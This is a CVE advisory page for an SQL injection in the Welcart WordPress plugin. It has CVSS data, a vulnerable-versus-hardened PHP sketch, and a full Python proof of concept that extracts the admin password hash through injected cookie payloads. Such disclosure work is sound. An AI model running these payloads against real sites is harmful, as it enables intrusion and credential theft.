Security Vulnerability Report
CVE-2025-10649 CVSS 6.5 MEDIUM

CVE-2025-10649

Published: 2025-10-08 12:15:36
Last Modified: 2026-04-15 00:35:42

Description

The Welcart e-Commerce plugin for WordPress is vulnerable to SQL Injection via the cookie in all versions up to, and including, 2.11.21 due to insufficient escaping on the user supplied value and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
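To show what the description means by "insufficient escaping" and "lack of sufficient preparation", here is an added illustrative sketch in WordPress-style PHP. It is not Welcart's actual code: the cookie name usces_cookie is taken from the PoC below, while the table name, column names and function names are assumed for illustration. The first function concatenates the cookie value into the query; the second validates it and uses $wpdb->prepare() so the value can only ever be a string literal.

```php
<?php
// Illustrative sketch, not the plugin's real code. Cookie name "usces_cookie"
// comes from the PoC on this page; "example_cart" / "cart_id" / "cart_data"
// are assumed placeholders.

// BEFORE (the CWE-89 pattern described in the advisory): the raw cookie value is
// interpolated into the SQL string. stripslashes() only undoes WordPress's
// magic-quotes-style slashing; it is not escaping and gives no protection.
function lookup_cart_vulnerable( $wpdb ) {
    $cart_id = isset( $_COOKIE['usces_cookie'] ) ? $_COOKIE['usces_cookie'] : '';
    $cart_id = stripslashes( $cart_id );
    $sql = "SELECT cart_data FROM {$wpdb->prefix}example_cart "
         . "WHERE cart_id = '" . $cart_id . "'";
    return $wpdb->get_var( $sql );
}

// AFTER: validate the value against the shape the plugin expects, then bind it
// with $wpdb->prepare(). Every SQL metacharacter in the cookie is now data.
function lookup_cart_hardened( $wpdb ) {
    $cart_id = '';
    if ( isset( $_COOKIE['usces_cookie'] ) ) {
        $cart_id = sanitize_text_field( wp_unslash( $_COOKIE['usces_cookie'] ) );
    }
    // Allow-list check: an opaque cart token should only be [A-Za-z0-9_-].
    if ( ! preg_match( '/^[A-Za-z0-9_-]{1,64}$/', $cart_id ) ) {
        return null; // treat malformed cookies as "no cart", never as SQL
    }
    $sql = $wpdb->prepare(
        "SELECT cart_data FROM {$wpdb->prefix}example_cart WHERE cart_id = %s",
        $cart_id
    );
    return $wpdb->get_var( $sql );
}
```

The CVSS vector (PR:L) only reflects that an Author-level session is needed to reach the query; the fix is the same regardless of privilege level, because any value read from $_COOKIE is attacker-controlled input.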

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Welcart e-Commerce (usc-e-shop) <= 2.11.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10649 - Welcart e-Commerce SQL Injection PoC
# Vulnerability: Cookie-based SQL Injection in Welcart e-Commerce plugin
# Affected versions: <= 2.11.21
# Required privilege: Author-level access or above

import requests
import sys
import time

TARGET_URL = "http://target-wordpress-site.com"
AUTH_COOKIE = "wordpress_logged_in_xxxxx=your_auth_cookie_here"  # Author-level session cookie


def exploit_sqli(target_url, auth_cookie, injection_payload):
    """
    Exploit the SQL injection vulnerability via Cookie manipulation.
    The vulnerable parameter is within a cookie value processed by the plugin.
    """
    # Craft the malicious cookie with SQL injection payload
    malicious_cookie = f"usces_cookie={injection_payload}; {auth_cookie}"
    headers = {
        "Cookie": malicious_cookie,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    }
    # Trigger the vulnerable code path
    response = requests.get(target_url, headers=headers)
    return response


def extract_data_time_based(target_url, auth_cookie):
    """
    Time-based blind SQL injection to extract sensitive data.
    Example: Extract admin password hash character by character.
    """
    extracted = ""
    for position in range(1, 50):
        for ascii_val in range(32, 127):
            # MySQL time-based blind injection payload
            # IF condition checks each character of the admin password hash
            payload = (
                f"1' AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),"
                f"{position},1))={ascii_val},SLEEP(2),0)-- -"
            )
            start_time = time.time()
            response = exploit_sqli(target_url, auth_cookie, payload)
            elapsed = time.time() - start_time
            if elapsed >= 2:
                # If SLEEP triggered, we found the character
                extracted += chr(ascii_val)
                print(f"[+] Position {position}: {chr(ascii_val)} (Hash so far: {extracted})")
                break
        else:
            # No character matched at this position: end of the value
            break
    return extracted


def extract_data_union_based(target_url, auth_cookie):
    """
    UNION-based SQL injection to extract data directly.
    """
    # First determine the number of columns
    for cols in range(1, 15):
        nulls = ",".join(["NULL"] * cols)
        payload = f"1' UNION SELECT {nulls}-- -"
        response = exploit_sqli(target_url, auth_cookie, payload)
        if response.status_code == 200:
            print(f"[+] Number of columns: {cols}")
            break

    # Extract admin credentials
    payload = (
        f"1' UNION SELECT user_login,user_pass,user_email,{','.join(['NULL'] * (cols - 3))} "
        f"FROM wp_users WHERE ID=1-- -"
    )
    response = exploit_sqli(target_url, auth_cookie, payload)
    print(f"[+] Response: {response.text[:500]}")


if __name__ == "__main__":
    print("[*] CVE-2025-10649 - Welcart e-Commerce SQL Injection PoC")
    print("[*] This PoC requires Author-level authenticated access")
    # Example usage (uncomment to use):
    # extract_data_time_based(TARGET_URL, AUTH_COOKIE)
    # extract_data_union_based(TARGET_URL, AUTH_COOKIE)
    print("[*] Please configure TARGET_URL and AUTH_COOKIE before running")
```

References

Weakness: CWE-89 (SQL Injection)
https://plugins.trac.wordpress.org/changeset/3374119/usc-e-shop (WordPress plugin changeset)
https://www.wordfence.com/threat-intel/vulnerabilities/id/4d59eedb-550f-44c1-a0cd-609c5661134d?source=cve (Wordfence advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10649",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-08T12:15:36.047",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Welcart e-Commerce plugin for WordPress is vulnerable to SQL Injection via the cookie in all versions up to, and including, 2.11.21 due to insufficient escaping on the user supplied value and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-89" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3374119/usc-e-shop",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d59eedb-550f-44c1-a0cd-609c5661134d?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```